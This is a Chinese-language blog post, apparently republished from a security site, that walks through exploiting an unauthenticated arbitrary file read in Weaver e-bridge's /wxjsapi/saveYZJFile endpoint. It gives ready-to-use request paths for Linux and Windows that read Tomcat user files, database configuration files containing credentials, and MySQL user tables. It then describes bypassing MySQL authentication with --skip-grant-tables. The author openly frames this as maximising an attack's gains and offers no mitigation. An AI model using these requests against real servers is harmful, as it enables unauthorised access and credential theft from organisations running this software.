漏洞简介
未授权任意文件读取,/wxjsapi/saveYZJFile接口获取filepath,输入文件路径->读取文件内容。返回数据包内出现了程序的绝对路径,攻击者可以通过返回内容识别程序运行路径从而下载数据库配置文件。
目录遍历+文件读取,我们能做的事情就很多了,比如读取管理员在桌面留下的密码文件、数据库配置文件、nginx代理配置、访问日志等。
漏洞利用
Linux
先获取e-bridge的安装路径
# path/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///&fileExt=txt
# path/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///usr/ewechat/&fileExt=txt
找到了当前目录,现在即可组合文件读取进行漏洞利用最大化。
tomcat-users.xml (tomcat配置文件)
# path/usr/ewechat/tomcat/conf/tomcat-users.xml
init.properties (数据库配置文件)
# path/usr/ewechat/tomcat/webapps/ROOT/WEB-INF/classes/init.properties
sqlserverconfig.properties (mssql用户名密码)
# path/usr/ewechat/tomcat/webapps/ROOT/WEB-INF/classes/sqlserverconfig.properties
user.MYD (mysql)
# path/usr/ewechat/mysql/data/mysql/user.MYD
下载mysql的user.MYD文件
记事本打开可以直接查看到密码的MD5值
user.frm user.MYD user.MYI (mysql)
# path/usr/ewechat/mysql/data/mysql/user.MYD/usr/ewechat/mysql/data/mysql/user.MYI/usr/ewechat/mysql/data/mysql/user.frm
-
自行搭建环境
-
下载user.frm user.MYD user.MYI这三个文件到本地替换
-
输入mysqld –skip-grant-tables 回车。–skip-grant-tables 的意思是启动MySQL服务的时候跳过权限表认证。
-
连接数据库查询
Windows
先获取e-bridge的安装路径
init.properties (数据库配置文件)
# pathd://ebridge//tomcat//webapps//ROOT//WEB-INF//classes//init.properties
e-bridge的相对路径是一样的,所以在win环境下,可根据以上Linux环境下的路径直接构造想要读取的文件路径:
# pathd:/ebridge/tomcat/webapps/ROOT/WEB-INF/classes/init.propertiesd:/ebridge/tomcat/conf/tomcat-users.xmld:/ebridge/tomcat/webapps/ROOT/WEB-INF/classes/sqlserverconfig.propertiesd:/ebridge/mysql/data/mysql/user.MYD...
### 分割线
这篇文章只是一种渗透思路的体现,不管是xss还是rce,其漏洞带来的影响都需要去被发散思维/最大化利用,以便将战果尽可能地扩大![配置文件读取绝对路径_泛微ebridge任意文件读取(实战trick)[通俗易懂]插图21 c6ee1d61f4072315c6ff92090e51db7a.png](https://img-blog.csdnimg.cn/img_convert/c6ee1d61f4072315c6ff92090e51db7a.png)
今天的文章配置文件读取绝对路径_泛微ebridge任意文件读取(实战trick)[通俗易懂]分享到此就结束了,感谢您的阅读。
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
如需转载请保留出处:http://bianchenghao.cn/83844.html
![配置文件读取绝对路径_泛微ebridge任意文件读取(实战trick)[通俗易懂]插图1 bff96b7084581ed613ee162459353d26.png](https://img-blog.csdnimg.cn/img_convert/bff96b7084581ed613ee162459353d26.png)
![配置文件读取绝对路径_泛微ebridge任意文件读取(实战trick)[通俗易懂]插图3 842cf00fe03f898af37c390c174bfb49.png](https://img-blog.csdnimg.cn/img_convert/842cf00fe03f898af37c390c174bfb49.png)
![配置文件读取绝对路径_泛微ebridge任意文件读取(实战trick)[通俗易懂]插图5 2be78486be19434617fb1bc947937d97.png](https://img-blog.csdnimg.cn/img_convert/2be78486be19434617fb1bc947937d97.png)
![配置文件读取绝对路径_泛微ebridge任意文件读取(实战trick)[通俗易懂]插图7 bbed4ef5389c6b7e93b0c146590a1603.png](https://img-blog.csdnimg.cn/img_convert/bbed4ef5389c6b7e93b0c146590a1603.png)
![配置文件读取绝对路径_泛微ebridge任意文件读取(实战trick)[通俗易懂]插图9 bb77c41a0b2f5ef9496eb86f3baa5a70.png](https://img-blog.csdnimg.cn/img_convert/bb77c41a0b2f5ef9496eb86f3baa5a70.png)
![配置文件读取绝对路径_泛微ebridge任意文件读取(实战trick)[通俗易懂]插图11 c5192fea37d1da2c57f19e3f5c683080.png](https://img-blog.csdnimg.cn/img_convert/c5192fea37d1da2c57f19e3f5c683080.png)
![配置文件读取绝对路径_泛微ebridge任意文件读取(实战trick)[通俗易懂]插图13 484088e4db1da46b2ee2a51da2089c08.png](https://img-blog.csdnimg.cn/img_convert/484088e4db1da46b2ee2a51da2089c08.png)
![配置文件读取绝对路径_泛微ebridge任意文件读取(实战trick)[通俗易懂]插图15 9f9b44dd94da1104cedfca99b6bacbdf.png](https://img-blog.csdnimg.cn/img_convert/9f9b44dd94da1104cedfca99b6bacbdf.png)
![配置文件读取绝对路径_泛微ebridge任意文件读取(实战trick)[通俗易懂]插图17 f7522182a34c6029d80729588c69a584.png](https://img-blog.csdnimg.cn/img_convert/f7522182a34c6029d80729588c69a584.png)
![配置文件读取绝对路径_泛微ebridge任意文件读取(实战trick)[通俗易懂]插图19 c9d9b201b83b740563232f2e7a324329.png](https://img-blog.csdnimg.cn/img_convert/c9d9b201b83b740563232f2e7a324329.png)